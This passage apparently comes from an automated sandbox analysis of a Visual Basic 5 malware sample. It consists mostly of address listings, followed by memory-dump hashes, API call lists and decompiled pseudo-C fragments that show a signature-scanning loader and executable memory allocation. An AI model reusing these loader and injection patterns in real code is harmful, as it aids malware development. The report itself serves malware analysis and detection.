                                                                        0x00401bc7
                                                                        0x00401bc9
                                                                        0x00401bcb
                                                                        0x00401bcd
                                                                        0x00401bcf
                                                                        0x00401bd1
                                                                        0x00401bd3
                                                                        0x00401bd7
                                                                        0x00401bd9
                                                                        0x00401bdb
                                                                        0x00401bdd
                                                                        0x00401bdf
                                                                        0x00401be1
                                                                        0x00401be3
                                                                        0x00401be5
                                                                        0x00401be7
                                                                        0x00401be9
                                                                        0x00401beb
                                                                        0x00401bee
                                                                        0x00401bef
                                                                        0x00401bf1
                                                                        0x00401bf3
                                                                        0x00401bf5
                                                                        0x00401bf7
                                                                        0x00401bf9
                                                                        0x00401bff
                                                                        0x00401c02
                                                                        0x00401c03
                                                                        0x00401c06
                                                                        0x00401c07
                                                                        0x00401c09
                                                                        0x00401c0b
                                                                        0x00401c0b
                                                                        0x00401c0e
                                                                        0x00401c10
                                                                        0x00401c13
                                                                        0x00401c17
                                                                        0x00401c1a
                                                                        0x00401c1b
                                                                        0x00401c1e
                                                                        0x00401c22
                                                                        0x00401c23
                                                                        0x00401c25
                                                                        0x00401c27
                                                                        0x00401c29
                                                                        0x00401c2b
                                                                        0x00401c2d
                                                                        0x00401c2f
                                                                        0x00401c32
                                                                        0x00401c33
                                                                        0x00401c35
                                                                        0x00401c36
                                                                        0x00401c38
                                                                        0x00401c38
                                                                        0x00401c3c
                                                                        0x00401c3e
                                                                        0x00401c40
                                                                        0x00401c42
                                                                        0x00401c44
                                                                        0x00401c47
                                                                        0x00401c47
                                                                        0x00401c4d
                                                                        0x00401c50
                                                                        0x00401c52
                                                                        0x00401c53
                                                                        0x00401c57
                                                                        0x00401c59
                                                                        0x00401c5b
                                                                        0x00401c5d
                                                                        0x00401c5f
                                                                        0x00401c61
                                                                        0x00401c61
                                                                        0x00401c63
                                                                        0x00401c65
                                                                        0x00401c67
                                                                        0x00401c69
                                                                        0x00401c6b
                                                                        0x00401c6d
                                                                        0x00401c6f
                                                                        0x00401c71
                                                                        0x00402037
                                                                        0x00402039
                                                                        0x0040203b
                                                                        0x0040203d
                                                                        0x0040203f
                                                                        0x00402041
                                                                        0x00402043
                                                                        0x00402045
                                                                        0x00402047
                                                                        0x00402049
                                                                        0x0040204b
                                                                        0x0040204d
                                                                        0x0040204f
                                                                        0x00402051
                                                                        0x00402053
                                                                        0x00402055
                                                                        0x00402057
                                                                        0x00402059
                                                                        0x0040205b
                                                                        0x0040205d
                                                                        0x0040205f
                                                                        0x00402061
                                                                        0x00402063
                                                                        0x00402065
                                                                        0x00402067
                                                                        0x00402069
                                                                        0x0040206b
                                                                        0x0040206d
                                                                        0x0040206f
                                                                        0x00402071
                                                                        0x00402073
                                                                        0x00402075
                                                                        0x00402077
                                                                        0x00402079
                                                                        0x0040207b
                                                                        0x0040207d
                                                                        0x0040207f
                                                                        0x00402081
                                                                        0x00402083
                                                                        0x00402085
                                                                        0x00402087
                                                                        0x00402089
                                                                        0x0040208b
                                                                        0x0040208e
                                                                        0x0040208f
                                                                        0x00402091
                                                                        0x00402093
                                                                        0x00402099
                                                                        0x0040209b
                                                                        0x0040209d
                                                                        0x0040209f
                                                                        0x004020a2
                                                                        0x004020a3
                                                                        0x004020aa
                                                                        0x004020af
                                                                        0x004020b1
                                                                        0x004020b3
                                                                        0x004020b5
                                                                        0x004020b7
                                                                        0x004020b9
                                                                        0x004020bb
                                                                        0x004020bd
                                                                        0x004020c0
                                                                        0x004020c2
                                                                        0x004020c4
                                                                        0x004020c6
                                                                        0x004020c7
                                                                        0x004020c9
                                                                        0x004020cb
                                                                        0x004020cd
                                                                        0x004020d0
                                                                        0x004020d2
                                                                        0x004020d4
                                                                        0x004020d6
                                                                        0x004020d7
                                                                        0x004020d9
                                                                        0x004020db
                                                                        0x004020de
                                                                        0x004020df
                                                                        0x004020e1
                                                                        0x004020e3
                                                                        0x004020e5
                                                                        0x004020e8
                                                                        0x004020f1
                                                                        0x004020f4
                                                                        0x004020f6
                                                                        0x004020f7
                                                                        0x004020f9
                                                                        0x004020fd
                                                                        0x00402100
                                                                        0x00402105
                                                                        0x00402107
                                                                        0x0040210a
                                                                        0x0040210b
                                                                        0x0040210e
                                                                        0x00402112
                                                                        0x00402115
                                                                        0x00402117
                                                                        0x00402119
                                                                        0x0040211b
                                                                        0x0040211d
                                                                        0x0040211f
                                                                        0x00402121
                                                                        0x00402124
                                                                        0x00402127
                                                                        0x0040212e
                                                                        0x00402130
                                                                        0x00402132
                                                                        0x00402134
                                                                        0x00402136
                                                                        0x00402137
                                                                        0x00402137
                                                                        0x0040213d
                                                                        0x00402140
                                                                        0x00402142
                                                                        0x00402143
                                                                        0x00402147
                                                                        0x00402149
                                                                        0x0040214b
                                                                        0x0040214d
                                                                        0x0040214f
                                                                        0x00402151
                                                                        0x00402151
                                                                        0x00402153
                                                                        0x00402155
                                                                        0x00402157
                                                                        0x00402159
                                                                        0x0040215b
                                                                        0x0040215d
                                                                        0x0040215f
                                                                        0x00402161
                                                                        0x00402163
                                                                        0x00402165
                                                                        0x00402167
                                                                        0x00402169
                                                                        0x0040216b
                                                                        0x0040216d
                                                                        0x0040216f
                                                                        0x00402171
                                                                        0x00402173
                                                                        0x00402175
                                                                        0x00402177
                                                                        0x00402179
                                                                        0x0040217b
                                                                        0x0040217d
                                                                        0x0040217f
                                                                        0x00402181
                                                                        0x00402183
                                                                        0x00402185
                                                                        0x00402187
                                                                        0x00402189
                                                                        0x0040218b
                                                                        0x0040218d
                                                                        0x0040218f
                                                                        0x00402191
                                                                        0x00402193
                                                                        0x00402195
                                                                        0x00402197
                                                                        0x00402199
                                                                        0x0040219b
                                                                        0x0040219d
                                                                        0x0040219f
                                                                        0x004021a1
                                                                        0x004021a3
                                                                        0x004021a5
                                                                        0x004021a7
                                                                        0x004021a9
                                                                        0x004021ab
                                                                        0x004021ad
                                                                        0x004021af
                                                                        0x004021b1
                                                                        0x004021b3
                                                                        0x004021b5
                                                                        0x004021b7
                                                                        0x004021b9
                                                                        0x004021bb
                                                                        0x004021bd
                                                                        0x004021bf
                                                                        0x004021c1
                                                                        0x004021c3
                                                                        0x004021c5
                                                                        0x004021cb
                                                                        0x004021cd
                                                                        0x004021cf
                                                                        0x004021d1
                                                                        0x004021d5
                                                                        0x004021d7
                                                                        0x004021d9
                                                                        0x004021db
                                                                        0x004021de
                                                                        0x004021df
                                                                        0x004021e2
                                                                        0x004021e3
                                                                        0x004021e5
                                                                        0x004021e7
                                                                        0x004021ed
                                                                        0x004021ef
                                                                        0x004021f1
                                                                        0x004021f3
                                                                        0x004021f5
                                                                        0x004021f7
                                                                        0x004021fa
                                                                        0x004021fb
                                                                        0x004021fd
                                                                        0x004021ff
                                                                        0x00402203
                                                                        0x00402205
                                                                        0x00402207
                                                                        0x0040220a
                                                                        0x0040220b
                                                                        0x0040220d
                                                                        0x0040220f
                                                                        0x00402213
                                                                        0x00402215
                                                                        0x00402217
                                                                        0x0040221a
                                                                        0x0040221b
                                                                        0x0040221d
                                                                        0x0040221f
                                                                        0x00402223
                                                                        0x00402225
                                                                        0x0040222b
                                                                        0x0040222f
                                                                        0x00402232
                                                                        0x00402233
                                                                        0x00402235
                                                                        0x00402237
                                                                        0x0040223e
                                                                        0x0040223f
                                                                        0x00402243
                                                                        0x00402246
                                                                        0x00402247
                                                                        0x0040224a
                                                                        0x0040224e
                                                                        0x00402251
                                                                        0x00402253
                                                                        0x00402255
                                                                        0x00402257
                                                                        0x00402259
                                                                        0x0040225b
                                                                        0x0040225f
                                                                        0x00402261
                                                                        0x00402262
                                                                        0x00402264
                                                                        0x00402268
                                                                        0x0040226a
                                                                        0x0040226c
                                                                        0x0040226e
                                                                        0x00402270
                                                                        0x00402274
                                                                        0x00402276
                                                                        0x00402277
                                                                        0x0040227b
                                                                        0x0040227e
                                                                        0x0040227f
                                                                        0x00402283
                                                                        0x00402285
                                                                        0x00402287
                                                                        0x00402289
                                                                        0x0040228b
                                                                        0x0040228d
                                                                        0x0040228f
                                                                        0x00402291
                                                                        0x00402293
                                                                        0x00402295
                                                                        0x00402297
                                                                        0x00402299
                                                                        0x0040229b
                                                                        0x0040229d
                                                                        0x0040229f
                                                                        0x004022a1
                                                                        0x004022a3
                                                                        0x004022a5
                                                                        0x004022a7
                                                                        0x004022a9
                                                                        0x004022ab
                                                                        0x004022ad
                                                                        0x004022af
                                                                        0x004022b1
                                                                        0x004022b3
                                                                        0x004022b5
                                                                        0x004022b7
                                                                        0x004022b9
                                                                        0x004022bb
                                                                        0x004022bd
                                                                        0x004022bf
                                                                        0x004022c1
                                                                        0x004022c3
                                                                        0x004022c5
                                                                        0x004022c7
                                                                        0x004022c9
                                                                        0x004022cb
                                                                        0x004022cd
                                                                        0x004022cf
                                                                        0x004022d1
                                                                        0x004022d3
                                                                        0x004022d5
                                                                        0x004022d7
                                                                        0x004022d9
                                                                        0x004022db
                                                                        0x004022dd
                                                                        0x004022df
                                                                        0x004022e1
                                                                        0x004022e3
                                                                        0x004022e5
                                                                        0x004022e7
                                                                        0x004022e9
                                                                        0x004022eb
                                                                        0x004022ed
                                                                        0x004022ef
                                                                        0x004022f1
                                                                        0x004022f3
                                                                        0x004022f5
                                                                        0x004022f7
                                                                        0x004022f9
                                                                        0x004022fb
                                                                        0x004022fd
                                                                        0x004022ff
                                                                        0x00402301
                                                                        0x00402303
                                                                        0x00402306
                                                                        0x00402307
                                                                        0x00402309
                                                                        0x0040230b
                                                                        0x0040230e
                                                                        0x0040230f
                                                                        0x00402311
                                                                        0x00402313
                                                                        0x00402315
                                                                        0x00402317
                                                                        0x0040231a
                                                                        0x0040231b
                                                                        0x00402321
                                                                        0x00402323
                                                                        0x00402325
                                                                        0x00402326
                                                                        0x0040274b
                                                                        0x0040274f
                                                                        0x00402751
                                                                        0x00402752
                                                                        0x00402754
                                                                        0x00402754
                                                                        0x00402758
                                                                        0x0040275a
                                                                        0x0040275c
                                                                        0x0040275e
                                                                        0x00402763
                                                                        0x0040276b
                                                                        0x0040276e
                                                                        0x0040276f
                                                                        0x00402773
                                                                        0x00402775
                                                                        0x00402777
                                                                        0x00402779
                                                                        0x0040277b
                                                                        0x0040277d
                                                                        0x0040277f
                                                                        0x00402781
                                                                        0x00402783
                                                                        0x00402785
                                                                        0x00402787
                                                                        0x00402789
                                                                        0x0040278b
                                                                        0x0040278d
                                                                        0x0040278f
                                                                        0x00402791
                                                                        0x00402793
                                                                        0x00402795
                                                                        0x00402797
                                                                        0x00402799
                                                                        0x0040279b
                                                                        0x0040279d
                                                                        0x0040279f
                                                                        0x004027a1
                                                                        0x004027a3
                                                                        0x004027a5
                                                                        0x004027a7
                                                                        0x004027a9
                                                                        0x004027ab
                                                                        0x004027ad
                                                                        0x004027af
                                                                        0x004027b1
                                                                        0x004027b3
                                                                        0x004027b5
                                                                        0x004027b7
                                                                        0x004027b9
                                                                        0x004027bb
                                                                        0x004027bd
                                                                        0x004027bf
                                                                        0x004027c1
                                                                        0x004027c3
                                                                        0x004027c5
                                                                        0x004027c7
                                                                        0x004027c9
                                                                        0x004027cb
                                                                        0x004027cd
                                                                        0x004027cf
                                                                        0x004027d1
                                                                        0x004027d3
                                                                        0x004027d5
                                                                        0x004027d7
                                                                        0x004027d9
                                                                        0x004027db
                                                                        0x004027dd
                                                                        0x004027df
                                                                        0x004027e1
                                                                        0x004027e3
                                                                        0x004027e5
                                                                        0x004027e7
                                                                        0x004027e9
                                                                        0x004027eb
                                                                        0x004027ed
                                                                        0x004027ef
                                                                        0x004027f1
                                                                        0x004027f3
                                                                        0x004027f6
                                                                        0x004027f7
                                                                        0x004027f9
                                                                        0x004027fb
                                                                        0x004027fd
                                                                        0x004027ff
                                                                        0x00402801
                                                                        0x00402803
                                                                        0x00402805
                                                                        0x00402809
                                                                        0x0040280e
                                                                        0x0040280f
                                                                        0x00402811
                                                                        0x00402813
                                                                        0x00402813
                                                                        0x00402816
                                                                        0x00402818
                                                                        0x0040281a
                                                                        0x0040281c
                                                                        0x0040281e
                                                                        0x00402820
                                                                        0x00402822
                                                                        0x00402824
                                                                        0x00402829
                                                                        0x0040282b
                                                                        0x00402832
                                                                        0x00402834
                                                                        0x00402839
                                                                        0x0040283b
                                                                        0x0040283e
                                                                        0x0040283f
                                                                        0x00402841
                                                                        0x00402843
                                                                        0x00402847
                                                                        0x00402849
                                                                        0x0040284b
                                                                        0x0040284e
                                                                        0x0040284f
                                                                        0x00402851
                                                                        0x00402857
                                                                        0x00402859
                                                                        0x0040285c
                                                                        0x0040285e
                                                                        0x0040285f
                                                                        0x00402861
                                                                        0x00402865
                                                                        0x00402867
                                                                        0x0040286e
                                                                        0x0040286f
                                                                        0x00402872
                                                                        0x00402877
                                                                        0x0040287b
                                                                        0x0040287d
                                                                        0x0040287f
                                                                        0x00402881
                                                                        0x00402883
                                                                        0x00402885
                                                                        0x00402887
                                                                        0x00402889
                                                                        0x00402889
                                                                        0x0040288c
                                                                        0x004028e8
                                                                        0x004028e8
                                                                        0x004028ea
                                                                        0x004028ec
                                                                        0x0040288e
                                                                        0x0040288e
                                                                        0x00402898
                                                                        0x00402899
                                                                        0x0040289b
                                                                        0x0040289d
                                                                        0x0040289f
                                                                        0x004028a6
                                                                        0x004028a8
                                                                        0x004028aa
                                                                        0x004028ac
                                                                        0x004028ae
                                                                        0x004028b2
                                                                        0x004028b3
                                                                        0x004028b5
                                                                        0x004028b6
                                                                        0x004028b8
                                                                        0x004028b8
                                                                        0x004028bc
                                                                        0x004028be
                                                                        0x004028c0
                                                                        0x004028c2
                                                                        0x004028c4
                                                                        0x004028c9
                                                                        0x004028ca
                                                                        0x004028cb
                                                                        0x004028cf
                                                                        0x004028d2
                                                                        0x004028d3
                                                                        0x004028d7
                                                                        0x004028d9
                                                                        0x004028db
                                                                        0x004028dd
                                                                        0x004028df
                                                                        0x004028e1
                                                                        0x004028e3
                                                                        0x004028e5
                                                                        0x004028e7
                                                                        0x00000000
                                                                        0x004028e7
                                                                        0x004028c4
                                                                        0x004028ee
                                                                        0x004028f0
                                                                        0x004028f2
                                                                        0x004028f4
                                                                        0x004028f6
                                                                        0x004028f8
                                                                        0x004028fa
                                                                        0x004028fc
                                                                        0x004028fe
                                                                        0x00402900
                                                                        0x00402902
                                                                        0x00402904
                                                                        0x00402906
                                                                        0x00402908
                                                                        0x0040290a
                                                                        0x0040290c
                                                                        0x0040290e
                                                                        0x00402910
                                                                        0x00402911
                                                                        0x00402914
                                                                        0x00402916
                                                                        0x00402917
                                                                        0x0040291b
                                                                        0x0040291e
                                                                        0x0040291f
                                                                        0x00402923
                                                                        0x00402925
                                                                        0x00402927
                                                                        0x00402929
                                                                        0x0040292b
                                                                        0x0040292d
                                                                        0x0040292f
                                                                        0x00402931
                                                                        0x00402933
                                                                        0x00402935
                                                                        0x00402937
                                                                        0x00402939
                                                                        0x0040293b
                                                                        0x0040293d
                                                                        0x0040293f
                                                                        0x00402941
                                                                        0x00402943
                                                                        0x00402945
                                                                        0x00402947
                                                                        0x00402949
                                                                        0x0040294b
                                                                        0x0040294d
                                                                        0x0040294f
                                                                        0x00402951
                                                                        0x00402953
                                                                        0x00402955
                                                                        0x00402957
                                                                        0x00402959
                                                                        0x0040295b
                                                                        0x0040295d
                                                                        0x0040295f
                                                                        0x00402961
                                                                        0x00402963
                                                                        0x00402965
                                                                        0x00402967
                                                                        0x00402969
                                                                        0x0040296b
                                                                        0x0040296d
                                                                        0x0040296f
                                                                        0x00402971
                                                                        0x00402973
                                                                        0x00402975
                                                                        0x00402977
                                                                        0x00402979
                                                                        0x0040297b
                                                                        0x0040297d
                                                                        0x0040297f
                                                                        0x00402981
                                                                        0x00402983
                                                                        0x00402985
                                                                        0x00402987
                                                                        0x00402989
                                                                        0x0040298b
                                                                        0x0040298d
                                                                        0x0040298f
                                                                        0x00402991
                                                                        0x00402993
                                                                        0x00402995
                                                                        0x00402997
                                                                        0x00402999
                                                                        0x0040299b
                                                                        0x0040299d
                                                                        0x0040299f
                                                                        0x004029a1
                                                                        0x004029a3
                                                                        0x004029a6
                                                                        0x004029a7
                                                                        0x004029a9
                                                                        0x004029ab
                                                                        0x004029ae
                                                                        0x004029af
                                                                        0x004029b3
                                                                        0x004029b6
                                                                        0x004029b8
                                                                        0x004029ba
                                                                        0x004029bb
                                                                        0x004029c1
                                                                        0x004029c4
                                                                        0x004029c6
                                                                        0x004029c8
                                                                        0x004029ca
                                                                        0x004029cc
                                                                        0x004029ce
                                                                        0x004029d0
                                                                        0x004029d2
                                                                        0x004029d4
                                                                        0x004029d6
                                                                        0x004029d8
                                                                        0x004029da
                                                                        0x004029dc
                                                                        0x004029de
                                                                        0x004029e0
                                                                        0x004029e2
                                                                        0x004029e4
                                                                        0x004029e6
                                                                        0x004029e8
                                                                        0x004029ea
                                                                        0x004029ec
                                                                        0x004029ee
                                                                        0x004029f0
                                                                        0x004029f2
                                                                        0x004029f4
                                                                        0x004029f6
                                                                        0x004029f8
                                                                        0x004029fa
                                                                        0x004029fc
                                                                        0x004029fe
                                                                        0x00402a00
                                                                        0x00402a02
                                                                        0x00402a04
                                                                        0x00402a06
                                                                        0x00402a08
                                                                        0x00402a0a
                                                                        0x00402a0c
                                                                        0x00402a0e
                                                                        0x00402a10
                                                                        0x00402a12
                                                                        0x00402a14
                                                                        0x00402a16
                                                                        0x00402a18
                                                                        0x00402a1a
                                                                        0x00402a1c
                                                                        0x00402a1e
                                                                        0x00402a20
                                                                        0x00402a22
                                                                        0x00402a24
                                                                        0x00402ddb
                                                                        0x00402ddd
                                                                        0x00402ddf
                                                                        0x00402de1
                                                                        0x00402de3
                                                                        0x00402de5
                                                                        0x00402de7
                                                                        0x00402de9
                                                                        0x00402deb
                                                                        0x00402ded
                                                                        0x00402def
                                                                        0x00402df1
                                                                        0x00402df3
                                                                        0x00402df5
                                                                        0x00402df7
                                                                        0x00402dfe
                                                                        0x00402dff
                                                                        0x00402e03
                                                                        0x00402e06
                                                                        0x00402e07
                                                                        0x00402e0b
                                                                        0x00402e0d
                                                                        0x00402e0f
                                                                        0x00402e11
                                                                        0x00402e13
                                                                        0x00402e15
                                                                        0x00402e17
                                                                        0x00402e19
                                                                        0x00402e1b
                                                                        0x00402e1d
                                                                        0x00402e1f
                                                                        0x00402e21
                                                                        0x00402e23
                                                                        0x00402e25
                                                                        0x00402e27
                                                                        0x00402e29
                                                                        0x00402e2b
                                                                        0x00402e2d
                                                                        0x00402e2f
                                                                        0x00402e31
                                                                        0x00402e33
                                                                        0x00402e35
                                                                        0x00402e37
                                                                        0x00402e39
                                                                        0x00402e3b
                                                                        0x00402e3d
                                                                        0x00402e3f
                                                                        0x00402e41
                                                                        0x00402e43
                                                                        0x00402e45
                                                                        0x00402e47
                                                                        0x00402e49
                                                                        0x00402e4b
                                                                        0x00402e52
                                                                        0x00402e53
                                                                        0x00402e57
                                                                        0x00402e5a
                                                                        0x00402e5b
                                                                        0x00402e5f
                                                                        0x00402e61
                                                                        0x00402e63
                                                                        0x00402e65
                                                                        0x00402e67
                                                                        0x00402e69
                                                                        0x00402e6b
                                                                        0x00402e6d
                                                                        0x00402e6f
                                                                        0x00402e71
                                                                        0x00402e73
                                                                        0x00402e75
                                                                        0x00402e77
                                                                        0x00402e79
                                                                        0x00402e7b
                                                                        0x00402e7d
                                                                        0x00402e7f
                                                                        0x00402e81
                                                                        0x00402e83
                                                                        0x00402e85
                                                                        0x00402e87
                                                                        0x00402e89
                                                                        0x00402e8b
                                                                        0x00402e8d
                                                                        0x00402e8f
                                                                        0x00402e91
                                                                        0x00402e93
                                                                        0x00402e95
                                                                        0x00402e97
                                                                        0x00402e99
                                                                        0x00402e9b
                                                                        0x00402e9d
                                                                        0x00402e9f
                                                                        0x00402ea1
                                                                        0x00402ea3
                                                                        0x00402ea5
                                                                        0x00402ea7
                                                                        0x00402ea9
                                                                        0x00402eab
                                                                        0x00402ead
                                                                        0x00402eb5
                                                                        0x00402eb8
                                                                        0x00402ebb
                                                                        0x00402ebe
                                                                        0x00402ebf
                                                                        0x00402ec3
                                                                        0x00402ec5
                                                                        0x00402ec7
                                                                        0x00402ec9
                                                                        0x00402ec9
                                                                        0x00402ecb
                                                                        0x00402ecd
                                                                        0x00402ecf
                                                                        0x00402ed1
                                                                        0x00402ed3
                                                                        0x00402ed5
                                                                        0x00402ed7
                                                                        0x00402ed9
                                                                        0x00402edb
                                                                        0x00402edd
                                                                        0x00402edf
                                                                        0x00402ee1
                                                                        0x00402ee3
                                                                        0x00402ee5
                                                                        0x00402ee7
                                                                        0x00402ee9
                                                                        0x00402eeb
                                                                        0x00402eed
                                                                        0x00402eef
                                                                        0x00402ef1
                                                                        0x00402ef3
                                                                        0x00402ef5
                                                                        0x00402ef7
                                                                        0x00402ef9
                                                                        0x00402efb
                                                                        0x00402efd
                                                                        0x00402eff
                                                                        0x00402f01
                                                                        0x00402f03
                                                                        0x00402f05
                                                                        0x00402f07
                                                                        0x00402f09
                                                                        0x00402f0b
                                                                        0x00402f0d
                                                                        0x00402f0f
                                                                        0x00402f11
                                                                        0x00402f13
                                                                        0x00402f15
                                                                        0x00402f17
                                                                        0x00402f19
                                                                        0x00402f1b
                                                                        0x00402f1d
                                                                        0x00402f1f
                                                                        0x00402f21
                                                                        0x00402f23
                                                                        0x00402f25
                                                                        0x00402f27
                                                                        0x00402f2e
                                                                        0x00402f2f
                                                                        0x00402f33
                                                                        0x00402f36
                                                                        0x00402f37
                                                                        0x00402f3b
                                                                        0x00402f3d
                                                                        0x00402f3f
                                                                        0x00402f41
                                                                        0x00402f43
                                                                        0x00402f45
                                                                        0x00402f47
                                                                        0x00402f49
                                                                        0x00402f4b
                                                                        0x00402f4d
                                                                        0x00402f4f
                                                                        0x00402f51
                                                                        0x00402f53
                                                                        0x00402f55
                                                                        0x00402f57
                                                                        0x00402f59
                                                                        0x00402f5b
                                                                        0x00402f5d
                                                                        0x00402f5f
                                                                        0x00402f61
                                                                        0x00402f63
                                                                        0x00402f65
                                                                        0x00402f67
                                                                        0x00402f69
                                                                        0x00402f6b
                                                                        0x00402f6d
                                                                        0x00402f6f
                                                                        0x00402f71
                                                                        0x00402f73
                                                                        0x00402f75
                                                                        0x00402f77
                                                                        0x00402f79
                                                                        0x00402f7b
                                                                        0x00402f7d
                                                                        0x00402f7f
                                                                        0x00402f86
                                                                        0x00402f87
                                                                        0x00402f8b
                                                                        0x00402f8e
                                                                        0x00402f8f
                                                                        0x00402f93
                                                                        0x00402f95
                                                                        0x00402f97
                                                                        0x00402f98
                                                                        0x00421847
                                                                        0x00421856
                                                                        0x00421862
                                                                        0x00421865
                                                                        0x00421872
                                                                        0x00421875
                                                                        0x00421879
                                                                        0x0042187f
                                                                        0x00421882
                                                                        0x00421889
                                                                        0x0042188f
                                                                        0x0042189a
                                                                        0x004218a3

                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.689859187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000A.00000002.689855403.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689873308.0000000000421000.00000020.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689876932.0000000000422000.00000004.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689880429.000000000042A000.00000004.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689883984.000000000042B000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: #100
                                                                        • String ID: VB5!6&*
                                                                        • API String ID: 1341478452-3593831657
                                                                        • Opcode ID: 4a94630f9d0ed2b473fe86552282cdef1b35c16a5982df7e594d711faab5adad
                                                                        • Instruction ID: 0ecceb6ba8861c98b4905b6d7a9acf2819b5a44605d6637ecb7ff1070faad8e2
                                                                        • Opcode Fuzzy Hash: 4a94630f9d0ed2b473fe86552282cdef1b35c16a5982df7e594d711faab5adad
                                                                        • Instruction Fuzzy Hash: C6B1006244E3C18FD7138B704DA55917FB0AE2321471E84EBC8C1DF4B3E22DA95AC76A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 38%
                                                                        			E0041C292(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __fp0) {
                                                                        				void* _t14;
                                                                        				void* _t15;
                                                                        				void* _t16;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t18;
                                                                        				void* _t19;
                                                                        				void* _t58;
                                                                        				void* _t59;
                                                                        				void* _t61;
                                                                        				signed int _t62;
                                                                        				void* _t63;
                                                                        				void* _t65;
                                                                        				void* _t82;
                                                                        				signed int _t85;
                                                                        				void* _t92;
                                                                        
                                                                        				_t92 = __fp0;
                                                                        				_t61 = __edx;
                                                                        				_t58 = __ecx;
                                                                        				_t47 = __ebx;
                                                                        				_t14 =  *((intOrPtr*)(__ebx + 0x68))();
                                                                        				asm("gs insb");
                                                                        				asm("insb");
                                                                        				_pop(_t63);
                                                                        				_t65 = __esi - 1;
                                                                        				asm("outsd");
                                                                        				if(_t65 == 0) {
                                                                        					 *(_t82 - 0x70) =  *(_t82 - 0x70) | _t85;
                                                                        					_t62 = _t85;
                                                                        					L12();
                                                                        					 *_t85 =  *_t85 + 0x44fff; // executed
                                                                        					_t15 = HeapCreate(1, 0, 0); // executed
                                                                        					 *(_t82 + 8) = _t15;
                                                                        					_t59 = _t63;
                                                                        					_t16 = L0041C326(_t47, _t59, _t63, _t65, __eflags, _t92);
                                                                        					_push(_t16);
                                                                        					_t17 = _t16 - 1;
                                                                        					__eflags = _t17;
                                                                        					asm("popad");
                                                                        					if(_t17 >= 0) {
                                                                        						asm("insb");
                                                                        						asm("insb");
                                                                        						asm("outsd");
                                                                        						asm("arpl [eax], ax");
                                                                        						__eflags =  &__imp___CIcos;
                                                                        						goto L13;
                                                                        						do {
                                                                        							do {
                                                                        								do {
                                                                        									L13:
                                                                        									asm("lodsd");
                                                                        									__eflags = _t17;
                                                                        								} while (_t17 == 0);
                                                                        								__eflags =  *_t17 - 0xffffffff83ec8b55;
                                                                        							} while ( *_t17 != 0xffffffff83ec8b55);
                                                                        							__eflags =  *((intOrPtr*)(_t17 + 4)) - 0xffffffff8d560cec;
                                                                        						} while ( *((intOrPtr*)(_t17 + 4)) != 0xffffffff8d560cec);
                                                                        						 *_t85 =  *_t85 + 0x44ffe;
                                                                        						__eflags =  *_t85;
                                                                        						_t18 =  *_t17(_t85, _t59, _t62, 2, _t85, 0, 0, 0); // executed
                                                                        						return _t18;
                                                                        					}
                                                                        					return _t17;
                                                                        				} else {
                                                                        					asm("o16 jns 0x4c");
                                                                        					asm("arpl [edi+0x6e], bp");
                                                                        					 *((intOrPtr*)(_t14 - 1)) =  *((intOrPtr*)(_t14 - 1)) + __ebx;
                                                                        					_t19 = _t63;
                                                                        					_push( *((intOrPtr*)(_t82 + 0x52)));
                                                                        				}
                                                                        			}



















                                                                        APIs
                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 0041C2AB
                                                                        • HeapCreate.KERNELBASE ref: 0041C31D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.689859187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000A.00000002.689855403.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689873308.0000000000421000.00000020.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689876932.0000000000422000.00000004.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689880429.000000000042A000.00000004.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689883984.000000000042B000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateHeapIconNotifyShell_
                                                                        • String ID: KERNEL32
                                                                        • API String ID: 2522922933-1217789123
                                                                        • Opcode ID: 1abacec55dd53c80b93eb16ec5708ea5ba95e1cb9cd8f259d6c29ad18bc844ed
                                                                        • Instruction ID: f6c9b3eb452472eef71d767f4126e5e32674215b3af36093e748069e1370d963
                                                                        • Opcode Fuzzy Hash: 1abacec55dd53c80b93eb16ec5708ea5ba95e1cb9cd8f259d6c29ad18bc844ed
                                                                        • Instruction Fuzzy Hash: F2113BA6528D342BF530A0B83C648DBB70CCE932B43522B4BFE50D10C0CA2549D385FD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • EnumWindows.USER32(04B203B7,?,?,00000100), ref: 04B20392
                                                                        • VirtualAllocEx.KERNELBASE(000000FF,00000000,08000000,00003000,00000040), ref: 04B203D9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocEnumVirtualWindows
                                                                        • String ID:
                                                                        • API String ID: 1323281959-0
                                                                        • Opcode ID: ff10654bd0f38353a7d4d8b819bc58430c397877d55b13b1621c9b14c0716bae
                                                                        • Instruction ID: 46b5077d49e3fb3d340d179f8b609f0b5126980b627cbbb860aaea8055ddb6d7
                                                                        • Opcode Fuzzy Hash: ff10654bd0f38353a7d4d8b819bc58430c397877d55b13b1621c9b14c0716bae
                                                                        • Instruction Fuzzy Hash: 0EF1692D7091918FCBA5DF25A8D8DD0BF309B8E211B486089C9AA97717E3242517DFB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 44%
                                                                        			E00402FB2(void* __eax, intOrPtr _a4) {
                                                                        
                                                                        				_a4 = _a4 - 0xffff;
                                                                        				_push(0x403ca4);
                                                                        				L0040114C();
                                                                        				_push(0);
                                                                        				asm("cdq");
                                                                        				_push(0x148cb63 / (__eax - 0x5c)); // executed
                                                                        				E00403BE8(); // executed
                                                                        				L00401146();
